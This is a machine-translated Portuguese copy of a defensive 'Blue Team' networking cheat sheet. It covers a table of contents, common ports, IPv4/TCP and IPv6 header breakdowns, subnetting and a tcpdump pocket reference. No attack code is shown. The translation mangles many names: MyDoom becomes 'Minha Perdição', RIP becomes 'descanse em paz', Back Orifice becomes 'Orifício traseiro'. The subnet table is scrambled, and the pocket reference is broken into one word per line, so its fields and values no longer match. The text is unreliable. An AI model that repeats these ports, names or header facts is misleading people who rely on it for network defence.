Machine Translated by Google

Machine Translated by Google

ÍNDICE

TÍTULO DA SEÇÃO PÁGINA

Índice - Ferramentas de rede/Blue Team............................................................. i

Índice - IR / Linux / Windows / Diversos................................................................... i

Índice - Resposta a incidentes / Notas............................................................. i

NETWORKING / FERRAMENTAS DA EQUIPE AZUL

Portas comuns...................................................................................................... 1

Cabeçalhos IPv4/TCP-UDP-ICMP, Sub-redes.......................................................... 2

Cabeçalho IPv6/TCP .............................................................................................. 6

Modelo OSI,................................................. .................................................. ........... 9

Conversão HTTP, FTP, Decimal para Hex ............................................................. 12

20 Controles Críticos de Segurança ............................................................................... 15

Referência do Cisco Networking All in One.............................................................. 17

ARGUS/TCPDUMP/TSHARK/NGREP................................................................... 21

Tcpdump .................................................................................................................... 23

Filtros de pacotes Berkeley e mascaramento de bits ............................................................. 24

Wireshark ........................................................................................................... 27

NMAP................................................................................................................................ 30

Referência rápida do Python .................................................................................... 34

Expressões regulares .......................................................................................... 36

BUFA................................................................................................................... 38

filtro rw ................................................................................................................ 41

eu
Machine Translated by Google

Escapando ................................................................................................................. 43

Mano...................................................................................................................... 44

FERRAMENTAS DIVERSAS / FOLHAS DE DICAS

Hacking do Google.............................................................................................................. 52

Netcat ................................................. .................................................. .............. 54

Pingando .............................................................................................................................. 56

Metasploit ........................................................................................................... 57

WINDOWS

Comandos úteis do Windows, Reg, Netsh, Netstat, Loops,................................. 62

Folhas de dicas de detecção de intrusão ....................................................................... 64

Resposta a incidentes do Windows .............................................................................. 68

IDs de eventos do log de segurança do Windows......................................................................... 69

Powershell........................................................................................................................ 70

Linux/UNIX

Fortalecimento do Linux .............................................................................................. 74

Comandos básicos do Linux...................................................................................... 78

Encaminhamento SSH ............................................................................................. 80

Iptables................................................................................................................... 83

Pesquisando em arquivos .................................................................................... 85

Cron............................................................................................................................. 88

VIEditor.................................................. .................................................. ............ 90

Remnux/Engenharia reversa de malware .............................................................. 94

eu
Machine Translated by Google

RESPOSTA A INCIDENTES/PICERL POR SITUAÇÃO

Resposta à infecção por vermes .............................................................................. 96

Detecção de malware do Windows .............................................................................. 98

Detecção de intrusão do Windows ............................................................................. 100

Desfiguração do site ........................................................................................ 102

Detecção de intrusão Linux/Unix.......................................................................... 104

Comportamento malicioso de rede ............................................................................. 106

Resposta a incidentes DDOS ............................................................................. 108

Resposta a incidentes de phishing ............................................................................. 110

Resposta a incidentes de engenharia social ............................................................. 112

FORMULÁRIOS DE RESPOSTA A INCIDENTES

Registro de comunicações de incidentes .......................................................................... 115

Lista de contatos de incidentes......................................................................................... 116

Identificação de incidentes......................................................................................... 118

Contenção de incidentes......................................................................................... 119

Erradicação de incidentes .......................................................................................... 120

Pesquisa de incidentes................................................................................................. 121

SEÇÃO DE NOTAS

Páginas em branco para anotações......................................................................... 122

AVISO LEGAL: Eu apenas compilei esta lista de folhas de dicas de outras fontes. Como tal, você encontrará referências a muitos indivíduos ou
organizações diferentes que criaram essas folhas de dicas. Não levo crédito por nenhuma de suas criações, exceto por uma ou duas que eu
criei. Como tal, o livro Blue Team Cheat Sheet é completamente gratuito e aberto para uso por qualquer pessoa ter ou editar. Eu
apenas os reuni em um
fonte.

iii
Machine Translated by Google
PORTOS COMUNS pacotelife.net

Números de porta TCP/UDP

7 Eco 554 RTSP 2745 Bagle.H 6891-6901 Windows ao vivo

19 Carga 546-547 DHCPv6 2967 Symantec AV 6970 Tempo rápido

20-21 FTP 560 rmonitor 3050 Banco de Dados Interbase 7212 Surf Fantasma

22 SSH/SCP 563 NNTP sobre SSL 3074 XBOX ao vivo 7648-7649 CU-SeeMe

23 Telnet 587 SMTP 3124 Proxy HTTP 8000 Rádio Internet

25 SMTP 591 Criador de Arquivos 3127 Minha Perdição Proxy HTTP 8080

42 Replicação WINS 593 Microsoft DCOM 3128 Proxy HTTP 8086-8087 Kaspersky antivírus
43 QUEM É 631 Impressão pela Internet 3222 GLBP 8118 Privoxi
49 TACACAS 636 LDAP sobre SSL Alvo iSCSI 3260 Servidor VMware 8200

53 DNS 639 MSDP (PIM) 3306 MySQL 8500 Adobe ColdFusion

67-68 DHCP/BOOTP 646 LDP (MPLS) Servidor de Terminal 3389 8767 Equipe Fala
69 TFTP 691 Troca de MS 3689 iTunes 8866 Bagle.B

70 esquilo 860 iSCSI 3690 Subversão JetDirect de 9100 HP

79 Dedo 873 sincronização reversa 3724 Mundo de Warcraft 9101-9103 Bacula

80 HTTP Servidor VMware 902 3784-3785 Ventrílo 9119 MXit

88 Cérbero 989-990 FTP sobre SSL 4333 mSQL 9800 WebDAV

102 MS Troca 993 IMAP4 sobre SSL 4444 Detonador 9898 Batedor

110 POP3 995 POP3 sobre SSL 4664 Google Área de Trabalho 9988 Robô espião/robô espião

113 Ident 1025 Microsoft RPC 4672 eMula 9999 Ouriço

119 NNTP (Usenet) 1026-1029 Windows Messenger 4899 Rádio 10000 Webmin

123 NTP 1080 MEIAS Proxy 5000 UPnP 10000 BackupExec

135 Microsoft RPC 1080 Minha Perdição Caixa de estilingue 5001 10113-10116 NetIQ

137-139 NetBIOS 1194 VPN aberta 5001 iprf 11371 PGP aberto
143 IMAP4 1214 Cazaque 5004-5005 RTP 12035-12036 Segunda Vida

161-162 SNMP 1241 Nesso 5050 Yahoo!Mensageiro 12345 Rede Bus

177 XDMCP 1311 Dell OpenManage 5060 SIP 13720-13721 Backup de rede
179 BGP 1337 RESÍDUOS 5190 AIM/ICQ 14567 Campo de batalha

201 AppleTalk 1433-1434 Microsoft SQL 5222-5223 XMPP/Jabber 15118 Rede de mergulho/Oddbob

264 BGMP 1512 VITÓRIAS 5432 PostgreSQL 19226 AdminSeguro

318 colher de chá 1589 Cisco VQP Servidor VNC 5500 19638 Ensim

381-383 HP Openview 1701 L2TP 5554 Sasser 20000 minutos de usuário

389 LDAP 1723 MS PPTP 5631-5632 pcEm qualquer lugar 24800 Sinergia
411-412 Conexão Direta 1725 Vapor 5800 VNC sobre HTTP 25999 X-Fogo

443 HTTP sobre SSL 1741 CiscoWorks 2000 Servidor VNC 5900+ 27015 Meia-vida

445 Microsoft DS Servidor de mídia MS 1755 6000-6001 X11 27374 Sub7

464 Cérbero RAIO 1812-1813 6112 Batalha.net 28960 Chamada do dever

465 SMTP sobre SSL 1863 MSN 6129 Ware de Senhora 31337 Orifício traseiro

497 Retrospectiva Cisco HSRP 1985 6257 WinMX 33434+ traceroute

500 ISAKMP Cisco SCCP 2000 6346-6347 Gnutela Lenda

512 execução Cisco ACS 2002 6500 GameSpy Arcade Bater papo

513 rlogin 2049 NFS 6566 SÃO

Criptografado
514 log do sistema Painel de controle 2082-2083 6588 AnalógicoX
Jogos
515 LPD/LPR 2100 Oracle XDB 6665-6669 CIR
Malicioso
520 descanse em paz 2222 Administração Direta 6679/6697 IRC sobre SSL
Pessoa para pessoa

521 RIPng (IPv6) 2302 aréola 6699 Napster

Transmissão
540 UUCP 2483-2484 Banco de Dados Oracle 6881-6999 BitTorrent

Atribuições de portas da IANA publicadas em http://www.iana.org/assignments/port-numbers

v1.1
por Jeremy Stretch
11
Machine Translated by Google

Folha de dicas de cabeçalho IP/TCP

Cada bloco representa 1 byte (8 bits) e blocos de largura dupla contam como 2 bytes, etc...

Tudo antes do endereço IP de destino é o cabeçalho IP (texto em negrito) e tudo depois é o cabeçalho TCP (em itálico). Produzido por Chris Davis.

4|5 00 00 28 eb 66 40 00 40 06 b4 ab
IP vers.|IHL Termos de Serviço
Comprimento do pacote IPID Bandeiras/Fragmentação TTL Codificação Soma de verificação

oa oa oa 80 d0 6d b5 c6 b9 50 00 50
Endereço IP de origem Endereço IP de destino Porto de origem Porto de destino

6c e5 9f 79 61 d8 31 a9 50 11 75 40
Número de sequência Número de reconhecimento TCP/HL Bandeiras Tamanho da janela

9a d8 00 00 Opções TCP ou Início da Carga Útil

Carga útil--->
Soma de verificação Ponteiro Urgente

|-----1 byte-----|----1 byte----|------------2 bytes---------|---------------------------4 bytes---------------------------|

1. Versão IP. Os primeiros quatro bits (1 hex) representam ipv4 ou ipv6. IHL é o comprimento do cabeçalho IP e compõe os segundos 4 bits (1 nibble) do bloco 1. Um IHL de 5 significaria que o comprimento do cabeçalho IP é de 20 bytes (5 x

4). Se o IHL tiver um comprimento de 6, o campo de opções IP será de 4 bytes após o ip Checksum.

2. TOS significa Tipo de serviço e tem a ver com priorização de tráfego. Neste caso, 00 significa sem priorização.

3. O tamanho do pacote simplesmente se refere ao tamanho total do pacote para que o roteador saiba quanto espaço no buffer alocar. Ou seja, --" 00 28" em hexadecimal seria 40 bytes.

4.IPID - Simplesmente o identificador do pacote para que o destinatário saiba como organizar os dados.

5. Fragmentação - Este campo se refere a como os pacotes são fragmentados. Um valor de "4"000 é Não Fragmentar. "2" Deve Fragmentar. "8" Reservado. "0" é o último pacote de fragmentação.

6. TTL - Time to live. Neste caso, "40" em hexadecimal seria um TTL de 64.

7. Codificação - Refere-se à codificação IP deste pacote. Neste caso, há um valor de "06" que significa simplesmente TCP. 01 é ICMP. 11 é UDP. 02 é IGMP. 09 é IGRP.

2f é GRE. 32 é ESP. 33 é AH. 39 é SKIP. 58 é EIGRP. 59 OSPF. 73 para L2TP.

8. Soma de verificação do cabeçalho IP para validar se o cabeçalho não foi alterado.

9. Endereço IP de origem

10. Endereço IP de destino

11. Porta de origem

12. Porto de destino

13. O número de sequência TCP usado pela camada de transporte para ordenar dados.

14. O campo Reconhecimento é usado para confirmar o recebimento de dados.

15. O TCP/HL é o comprimento do cabeçalho TCP e "50" em hexadecimal seria apenas "5", pois ignoramos o 0 nesta instância. Então, um valor de "5" significa que o comprimento do cabeçalho TCP é 5x4=20 bytes.

16. Campo de sinalizadores TCP. Este tem 2 hexadecimais (8 bits). Dependendo dos bits que estão ativados, ele representa CWR, ECN-Echo, URG, ACK, PSH, RST, SYN ou FIN. Esses bits são alinhados da seguinte forma: | C | E | U | A | P | R | S |

F | Neste caso, os caracteres hexadecimais são "11", o que equivaleria a 17 em decimal e teria os seguintes bits nesta ordem: | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | Podemos deduzir que os sinalizadores ACK e FIN estão definidos.

17. O campo de tamanho das janelas TCP é usado para mostrar o número de bytes que podem ser transferidos para o destino antes que um ACK seja enviado.

18. O Checksum do cabeçalho TCP é usado para validar a integridade do campo do cabeçalho TCP.

19. O campo de ponteiro urgente é usado para identificar a localização de dados urgentes dentro do pacote. Na maioria dos casos, será 00 00.

20. O campo de opções TCP representado no gráfico tem 4 bytes, mas pode ter de 0 a 40 bytes. Este campo frequentemente não existirá e depende do TCP/HL (consulte 15).

Como o comprimento do cabeçalho TCP era apenas 20, o cabeçalho TCP terminou após o ponteiro urgent e não há opções TCP neste exemplo. Isso iniciaria o payload se houvesse um. Geralmente não há um campo de opções TCP. As opções

são:

0 Fim das Opções 1 Nenhuma operação (pad) 2 Tamanho máximo do segmento 3 Escala de janela 4 ACK seletivo ok 8 Carimbo de data/hora

22
Machine Translated by Google

SUB-REDE IPV4 pacotelife.net

Sub-redes Decimal para Binário
CIDR Máscara de sub-rede Endereços Curinga Máscara de sub-rede Curinga

/32 255.255.255.255 1 0.0.0.0 255 1111 1111 0 0000 0000

/31 255.255.255.254 2 /30 0.0.0.1 254 1111 1110 1 0000 0001

255.255.255.252 4 /29 0.0.0.3 252 1111 1100 3 0000 0011

255.255.255.248 8 /28 0.0.0.7 248 1111 1000 7 0000 0111

255.255.255.240 16 /27 0.0.0.15 240 1111 0000 15 0000 1111

255.255.255.224 32 /26 0.0.0.31 224 1110 0000 31 0001 1111

255.255.255.192 64 /25 0.0.0.63 192 1100 0000 63 0011 1111

255.255.255.128 128 /24 0.0.0.127 128 1000 0000 127 0111 1111

255.255.255.0 /23 256 0.0.0.255 0 0000 0000 255 1111 1111

255.255.254.0 /22 512 0.0.1.255

Proporção de sub-rede
255.255.252.0 /21 1.024 0.0.3.255

255.255.248.0 /20 2.048 0.0.7.255

255.255.240.0 /19 4.096 0.0.15.255

/27
255.255.224.0 /18 8.192 0.0.31.255 /26 /28
0.0.63.255 /29
255.255.192.0 /17 16.384
/30
255.255.128.0 /16 32.768 0.0.127.255
/30
255.255.0.0 /15 65.536 0.0.255.255

255.254.0.0 /14 131.072 0,1,255,255

255.252.0.0 /13 262.144 0,3,255,255

/25
255.248.0.0 /12 /3 524.288 0,7,255,255

224.0.0.0 /2 192.0.0.0/1 1.048.576 0,15,255,255

128.0.0.0/0 0.0.0.0 2.097.152 0,31,255,255

4.194.304 0,63,255,255 Faixas de classe

Um 0.0.0.0 – 127.255.255.255
8.388.608 0,127,255,255
B 128.0.0.0 - 191.255.255.255
16.777.216 0,255,255,255
C 192.0.0.0 - 223.255.255.255
33.554.432 1.255.255.255
E 224.0.0.0 - 239.255.255.255
67.108.864 3.255.255.255
E 240.0.0.0 - 255.255.255.255
134.217.728 7.255.255.255

268.435.456 15.255.255.255 Faixas Reservadas

536.870.912 31.255.255.255 RFC 1918 10.0.0.0 - 10.255.255.255

1.073.741.824 63.255.255.255 Host local 127.0.0.0 - 127.255.255.255

2.147.483.648 127.255.255.255 RFC 1918 172.16.0.0 - 172.31.255.255

4.294.967.296 255.255.255.255 RFC 1918 192.168.0.0 - 192.168.255.255

Terminologia
CIDR VLSM
O roteamento interdomínio sem classes foi desenvolvido Máscaras de sub-rede de comprimento variável são um comprimento
para fornecer mais granularidade do que o arbitrário entre 0 e 32 bits; CIDR depende de VLSMs para definir rotas
endereçamento com classes legado; a notação CIDR é expressa como /XX

por Jeremy Stretch v2.0 3 3

 UDP
Cabeçalho tcpdump
do
Uso
bits
de
Número
tcpdump
[-
3
2
1 ['expressão_de_filtro']
arquivo]
iw
[- rssnaplen]
[-
9
8
7
6
5
4
3
2
1
0
Machine Translated by Google

origem
de
Porta destino
de
Porto dados.
de
link
do
cabeçalho
Exibir
-e
-F
arquivo.
no
expressão
Filtrar
Comprimento
verificação
de
Soma
int.
interface
na
Escuta
-i
IP.
endereços
resolver
Não
-n
arquivo.
do
pacotes
Lê
-r

e
pacote.
cada
de
snaplen
bytes
Obtém
-s

e
eco
7 dgm
netbios-
138 absolutos.
TCP
sequência
de
números
Usa
-S

Portas
Versão
tempo
37
carga
19 snmp
161 hora.
e
data
de
registro
imprime
Não
-t

Informações
snmp
armadilha
162

TCP/
BOLSO
REFERÊNCIA
DE
GUIA detalhado.
Modo
-v
domínio
53 isakmp
500
arquivo.
em
pacotes
Grava
-w
tftp
69
bootpc
68
(DHCP)
bootps
67 sistema
do
log
514

rasgar
520
hexadecimal.
em
Exibir
-x

•
traceroute
33434 ASCII.
e
hexadecimal
em
Exibir
-X
ns
netbios-
137

8)
=
mínimo
valor
cabeçalho;
incluindo
datagrama,
o
todo
em
bytes
de
(Número
Siglas
E
CURSOS

[email protected]

Comprimento
PARA558

Soma
UDP)
datagrama
todo
e
pseudocabeçalho
o
(Abrange
graduação:
de
programas
dois
oferece
e

InstitutoMestre
MGT512

Forense
ARP

bits
de
Número

Mestre
3
2
1

9
8
7
6
5
4
3
2
1
0 meses
12
e
bacharel
de
diploma
um
tem
você
Se
GSLC

hardware
endereço
de
Tipo protocolo
endereço
de
Tipo

Gerentes
Fundamentos
siga
informação,
da
segurança
em
experiência
de SEC401
Len
Endereço
w
H/ Len
Endereço
Prot. Operação
começar:
para
fáceis
etapas
estas
origem
hardware
de
Endereço
GSEC

(continuação)
origem
hardware
de
Endereço Origem
de
Protocolo
do
Endereço
em
download
para
–
requerimento
um
•Preencha SANS
SEC502
(continuação)
origem
de
protocolo
do
Endereço destino
hardware
de
Endereço

(cont.)
destino
hardware
de
Endereço

(GCFM)
Mundial
Monetário
Fundo

Alvo
Protocolo
do
Endereço

é
formulário
o
–
empregador
do
recomendação
a
•Envie
fornecido
Proteção

www.sans.edu/
SEC503

e
STI
o
lacradas
transcrições
enviar
faculdade
sua
•para

Tipo
Ethernet
1
GCIA
802
IEEE
local
Rede
6

Parâmetros
inscrição
de
taxa
uma
•Enviar
Detecção

SEC556

Tipo
(0x0800)
IPv4
2048

802
IEEE
Ethernet/
para
6

SEC560
Análise

Comprimento
IPv4
para
4
e

Saiba

Comprimento
GPEN
Solicitação
1

Entre
Teste

Resposta
2

Operação
editor.org
www.rfc-
http://
em
encontrados
ser
podem
RFCs
os
Todos

4
[email protected]

4
 DNS ICMP IP
Cabeçalho TCP
Cabeçalho

bits
de
Número bits
de
Número bits
de
Número
bits
de
Número
1 3
2
1 3
2
1
3
2
1
9
8
7
6
5
4
3
2
1
0 9
8
7
6
5
4
3
2
1
0 9
8
7
6
5
4
3
2
1
0 9
8
7
6
5
4
3
2
1
0
Machine Translated by Google

TCP)
(SOMENTE
COMPRIMENTO Código verificação
de
Soma Versão DIH origem
de
Porta destino
de
Porto
Tipo serviço
de
Tipo total
Comprimento

IA.
EU Identificação sequência
de
Número
mensagem...
da
específicas
informações
Outras Bandeiras Fragmento
de
Deslocamento

QR
operação
de
Código RA
RD
TC
AA RC
CÓDIGO viver
de
Tempo Protocolo cabeçalho
do
verificação
de
Soma reconhecimento
de
Número

a
Desvio
origem
de
Endereço
Reservado Bandeiras Janela
QD
CONTAGEM
eco
de
Resposta
0 Cabeçalho)
do
(Comprimento

Nome/
Inalcançável
Destino
3
verificação
de
Soma
CONTA destino
de
Endereço Urgente
Ponteiro
Inacessível
Rede
0

NSCONTAGEM inacessível
Host
1 (opcional)
Opções
(opcional)
Opções
Inacessível
Protocolo
2
AR
CONTA Inacessíveis
Portas
3

IP
DF
conjunto
e
necessária
Fragmentação
4
perguntas
de
Seção
e

falhou
origem
de
Rota
5
http
80
finger
79
domínio
53
smtp
25
telnet
23
ssh
22
control
21
data
ftp-
20
chargen
19
eco
7
Conteúdo

versão
IP
4 sunrpc
111
pop3
110
desconhecida
destino
de
Rede
6

Conteúdo
Portas

Respostas
de
Seção

Versão
Desconhecido
Host
Destino
7
ntp
119
Autoridade
de
Seção isolado
origem
de
Host
8
mínimo
IP;
cabeçalho
no
bits
32
palavras
de
Número ssn
netbios-
139
Proibida
Administrativamente
Rede
9
(60
15
máximo
e
bytes)
(20
5
=
valor imap
143
adicionais
informações
de
Seção
Proibido
Administrativamente
Host
10

Comprimento
bgp
179

--
TOS
para
inacessível
Rede
11
000 LDAP
389

Tipo
TOS
para
inacessível
Host
12 (000-111)
Precedência

atraso)
minimizar
=
(1
D (ssl)
https
443
Proibida
Administrativamente
Comunicação
13
ds
microsoft-
445
longo)
ao
maximizar
=
(1
T
extinção
de
Fonte
4
meias
1080
Redirecionamento
5 0
confiabilidade)
maximizar
=
(1
R
Consulta
0

Parâmetros
custos)
minimizar
=
(1
C capaz
ECN
=
1

Consulta/
Resposta
1 Rede
a
para
Datagrama
de
Redirecionamento
0
0)
como
definido
e
x experimentado
congestionamento
=
1
host
o
para
redirecionamento
de
Datagrama
1 5
=
mínimo
valor
TCP;
cabeçalho
no
bits
32
palavras
de
Número
Desvio

Código
Rede
e
TOS
para
Datagrama
de
Redirecionamento
2
(QUERY)
padrão
Consulta
0
Host
e
TOS
o
para
Datagrama
de
Redirecionamento
3 65.535
=
máximo
comprimento
pacote;
no
bytes
de
Número
(IQUERY)
inversa
Consulta
1
Eco
8 0
como
definido
bits;
4
(STATUS)
servidor
do
status
de
Solicitação
2
roteador
do
Anúncio
9

Comprimento
0)
como
definido
e
x
roteador
de
Seleção
10

AA
fragmentar)
Não
=
(1
D

Bandeiras
Autorizada)
Resposta
=
(1 Excedido
Tempo
11
00)
senão
empregado;
é
quando
(usados
ECN
Bits
Fragmentos)
Mais
=
(1
M
trânsito
em
excedido
vida
de
Tempo
0
Reservado Bandeiras

metade)
pela
congestionamento
de
janela
a
cortou
remetente
o
=
(1
CWR

TC
TrunCação)
=
(1 excedido
fragmento
remontagem
de
Tempo
1 metade)
pela
congestionamento
de
janela
a
corta
receptor
=
(1
Echo
ECN-
parâmetros
12
de
Problema bytes
8
de
unidades
em
original,
datagrama
no
fragmento
deste
Posição
servidor
do
aplicação
notificar
urgente,
ponteiro
Consultar
=
(1
U
erro
o
indica
0
ponteiro
O

RD
Deslocamento
desejada)
Recursão
=
(1 urgentes)
dados
de
obrigatória
opção
uma
Faltando
1
confirmação)
de
campo
Consultar
=
(1
A
ruim
Comprimento
2 CIPM
1 UDP
17 PULAR
57

RA
envio)
de
Dados
=
(1
P
disponível)
Recursão
=
(1 hora
data/
de
Carimbo
13 IGMP
2 GRE
47 EIGRP
88
Protocolo
conexão)
Redefinir
=
(1
R
hora
data/
carimbo
de
Resposta
14 TCP
6 ESP
50 sobretensão
contra
Proteção
89

sequência)
de
números
Sincronizar
=
(1
S
informações
de
Solicitação
15 IGRP
9 AH
51 L2TP
115
0)
como
definido
(Reservado; conexão)
Finalizar
dados;
mais
sem
=
(1
F
informação
de
Resposta
16
Endereço
Máscara
de
Solicitação
17
Soma

erro
Nenhum
0 IP
cabeçalho
o
apenas
Abrange
Soma

Responder
Máscara
Endereço
18 TCP
segmento
todo
e
pseudocabeçalho
o
Abrange

Código
formato
de
Erro
1 rota
de
Rastreamento
30
servidor
do
Falha
2 ID_DE_REDE PRIVADOS
ENDEREÇOS
1918
RFC
(NXDOMAIN)
inexistente
Domínio
3 10.0.0.0-10.255.255.255
A
Classe
0-127 urgentes
dados
para
deslocamento
de
Ponteiro
implementado
não
consulta
de
Tipo
4 172.16.0.0-172.31.255.255
B
Classe
128-191
Ponteiro

Endereçamento

recusada
Consulta
5
Eco)
de
Resposta
(Eco/
PING (multidifusão)
D
224-239
C
Classe
192-223 192.168.0.0-192.168.255.255
opções
de
lista
da
Fim
0 janela
de
Escala
3
bits
de
Número
Opções

(pad)
operação
Nenhuma
1 ok
seletivo
ACK
4
(experimental)
E
Classe
240-255
perguntas)
seção
na
entradas
de
(Número 3
2
1
ID_DO_HOST segmento
do
máximo
Tamanho
2 hora
data/
de
Carimbo
8

CONTAGEM
9
8
7
6
5
4
3
2
1
0 (antigo)
transmissão
rede;
de
Valor
0
Resposta)
seção
na
recursos
registros
de
(Número

CONTA
Transmissão
255
0)
ou
(8
Tipo (0)
Código verificação
de
Soma
4

Autoridade)
seção
na
nomes
servidor
do
recursos
registros
de
(Número
Identificador sequência
de
Número opções
de
lista
da
Fim
0 hora
data/
de
Carimbo
68
Opções

(pad)
operação
Nenhuma
1 solta
fonte
de
Rota
131
Adicionais.
Informações
seção
na
recursos
registros
de
(Número Dados... registro
de
Rota
7 estrita
origem
de
Rota
137

NSCONTAGEM CONTA

5
5
Machine Translated by Google

Folha de dicas do cabeçalho IPv6/TCP

6000000000340640
Ver Classe de Tráfego Etiqueta de fluxo Comprimento da carga útil Próximo limite de salto de cabeçalho

ff 2 1 5 0 a 0 8 0 f 0 7 fde
0 dB 0 c 0 2 1 0 0 9 0 a 1 1 2
Endereço IP de origem

ff 1 8 0 8 0 8 0 8 0 0 0 0 0 0
0000000000000009e
Endereço IP de destino

um 3 e 0 0 5 0 c F6f9d9c0
Porto de origem Porto de destino Número de sequência Número de reconhecimento

00005011 e0216e f5
Número de confirmação cont.... TCP/HL Bandeiras Tamanho da janela Soma de verificação

0 0 0 0 de c0216e e59c
Ponteiro Urgente Opções TCP ou Payload Carga útil

<-----1 byte-----|-------1 byte------|------------------2 bytes----------------|---------------------------------------4 bytes------------------------------------>

Desenvolvido por Christopher Davis
1. Versão IP
2. Classe de Tráfego

3. Etiqueta de fluxo

4. Comprimento da carga útil

5. Próximo Cabeçalho

6. Limite de salto
7. Endereço IP de origem - ff21:50a0:80f0:7fde:db0:c021:90:a112

8. Endereço IP de destino - ff18:808:8::9f

11. Porta de origem

12. Porto de destino

13. O número de sequência TCP usado pela camada de transporte para ordenar dados.

14. O campo Reconhecimento é usado para confirmar o recebimento de dados.

15. O TCP/HL é o comprimento do cabeçalho TCP e "50" em hexadecimal seria apenas "5", pois ignoramos o 0 nesta instância. Então, um valor de "5" significa que o comprimento do cabeçalho TCP é 5x4=20

bytes.

16. Campo de sinalizadores TCP. Este tem 2 hexadecimais (8 bits). Dependendo dos bits que estão ativados, ele representa CWR, ECN-Echo, URG, ACK, PSH, RST, SYN ou FIN. Esses bits são
alinhados da seguinte forma: | C | E | U | A | P | R | S | F | Neste caso, os caracteres hexadecimais são "11", o que equivaleria a 17 em decimal e teria o seguinte
bits nesta ordem: | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | Podemos deduzir que os sinalizadores ACK e FIN estão definidos.

17. O campo de tamanho das janelas TCP é usado para mostrar o número de bytes que podem ser transferidos para o destino antes que um ACK seja enviado.

18. O Checksum do cabeçalho TCP é usado para validar a integridade do campo do cabeçalho TCP.

19. O campo de ponteiro urgente é usado para identificar a localização de dados urgentes dentro do pacote. Na maioria dos casos, será 00 00.

20. O campo de opções TCP representado no gráfico tem 4 bytes, mas pode ter de 0 a 40 bytes. Esse campo geralmente não existe e depende do TCP/HL (consulte 15). Como o comprimento do cabeçalho TCP
era de apenas 20, o cabeçalho TCP terminou após o ponteiro urgent e não há opções TCP neste exemplo. Isso inicia o payload se nenhuma opção estiver presente.

66
Machine Translated by Google

IPV6 pacotelife.net
Cabeçalho do Protocolo Notação de Endereço
8 16 24 32
· Elimine os zeros à esquerda de todos os conjuntos de dois bytes
Ver Classe de Tráfego Etiqueta de fluxo
· Substituir até uma sequência de zeros consecutivos por
Comprimento da carga útil Próximo Cabeçalho Limite de salto dois pontos (::)

Formatos de Endereço
Endereço de origem
Unicast global

Sub-rede de prefixo global ID da interface

Endereço de destino 48 16 64

Link-local unicast

Versão (4 bits) · Sempre definido como 6 ID da interface

Classe de tráfego (8 bits) · Um valor DSCP para QoS 64 64
Rótulo de fluxo (20 bits) · Identifica fluxos exclusivos (opcional)
Multidifusão
Comprimento da carga útil (16 bits) · Comprimento da carga útil em bytes
Bandeiras
ID do grupo
Escopo
Próximo Cabeçalho (8 bits) · Cabeçalho ou protocolo que segue
844 112
Limite de salto (8 bits) · Semelhante ao campo de tempo de vida do IPv4
Formação EUI-64
Endereço de origem (128 bits) · Endereço IP de origem

Endereço de destino (128 bits) · Endereço IP de destino MAC

Tipos de Endereço
EUI-64
Unicast · Comunicação um-para-um

Multicast · Comunicação um-para-muitos · Insira 0xfffe entre as duas metades do MAC

Anycast · Um endereço configurado em vários locais · Inverta o sétimo bit (bandeira universal/local) para 1

Escopos de multidifusão Cabeçalhos de extensão

1 Interface-local 5 Site-local Opções hop-by-hop (0)

Carrega informações adicionais que devem ser examinadas por cada roteador no
2 Link-local 8 Organizações locais
caminho
4 Admin-local E Global
Roteamento (43)
Fornece funcionalidade de roteamento de origem
Faixas de uso especial
Fragmento (44)
::/0 ::/ Rota padrão Incluído quando um pacote foi fragmentado por sua fonte

Não especificado Encapsulando a carga útil de segurança (50)

Fornece criptografia de carga útil (IPsec)
128 ::1/128 ::/ Retorno
Cabeçalho de autenticação (51)
96 Compatível com IPv4* Fornece autenticação de pacotes (IPsec)

::FFFF:0:0/96 IPv4 mapeado Opções de Destino (60)

Carrega informações adicionais que pertencem apenas ao destinatário
2001::/32 Teredo
Mecanismos de Transição
2001:DB8::/32 2002::/16 Documentação
Pilha dupla
6 para 4
Transportando IPv4 e IPv6 simultaneamente em uma infraestrutura
FC00::/7 Local único Túnel
FE80::/10 Link-local unicast O tráfego IPv6 é encapsulado em IPv4 usando IPv6-in-IP, UDP (Teredo) ou Intra-Site
Automatic Tunnel Addressing Protocol (ISATAP)
FEC0::/10 Unicast local do site*
Tradução
FF00::/8 Multidifusão Stateless IP/ICMP Translation (SIIT) traduz campos de cabeçalho IP, NAT
* Obsoleto Mapas de tradução de protocolo (NAT-PT) entre endereços IPv6 e IPv4

por Jeremy Stretch v2.0 7

7
Machine Translated by Google
Folha de dicas do IPv6 Cabeçalhos de extensão IPv6
Cabeçalho IPv6 Cabeçalho TCP
(NH = Próximo Cabeçalho)
NH = TCP + Dados
Cabeçalho IPv6

Versão (4) Classe de Tráfego (8) Etiqueta de fluxo (20) Cabeçalho IPv6 Cabeçalho de roteamento Cabeçalho TCP
NH = Roteamento NH = TCP + Dados
Comprimento da carga útil (16) Próximo Cabeçalho (8) Limite de Salto (8)

Endereço de origem (128 bits) [16 bytes] Cabeçalho IPv6 Cabeçalho de roteamento Cabeçalho do Fragmento Cabeçalho TCP
NH = Roteamento NH = Fragment NH = TCP + Dados
Endereço de destino (128 bits) [16 bytes]

Versão : Número da versão IP (6). *

Endereçamento IPv6 Obsoleto
Classe de tráfego : usada por nós de origem e/ou roteadores de encaminhamento para
Tipo de endereço Prefixo binário Notação IPv6
identificar
e distinguir entre diferentes classes ou prioridades de pacotes IPv6. Não especificado 00...0 (128 bits) ::/128
Rótulo de fluxo : usado por uma fonte para rotular sequências de pacotes para os quais ela
Retorno 00...1 (128 bits) ::1/128
solicita tratamento especial pelos roteadores IPv6.
Comprimento da carga útil : comprimento da carga útil IPv6 (também os cabeçalhos de extensão). Multidifusão 11111111 FF00::/8
Próximo Cabeçalho : Identifica o tipo de cabeçalho após o cabeçalho IPv6. Link-local unicast 1111111010 FE80::/10
Limite de salto : decrementado em 1 por cada nó que encaminha o pacote.
Unicast local do site* 1111111011 FEC0::/10
Endereço de origem : Endereço do originador do pacote
Endereço de destino : Endereço do destinatário pretendido do pacote (possivelmente não o Unicast local exclusivo 1111110000 FC00::/7
destinatário final, se um cabeçalho de roteamento estiver presente)
Unicast global (tudo o resto)
Formato geral para endereços unicast globais IPv6
Transmissão em massa Endereço unicast atribuído a múltiplas interfaces.
Prefixo de roteamento global (n bits) ID de sub-rede (m) Identificação da interface (128 nm)
IPv6 compatível com IPv4* 0:0:0:0:0:0:ABCD
Endereços IPv6 Global Unicast (não começando com o valor binário 000) 0:0:0:0:0:FFFF:ABCD
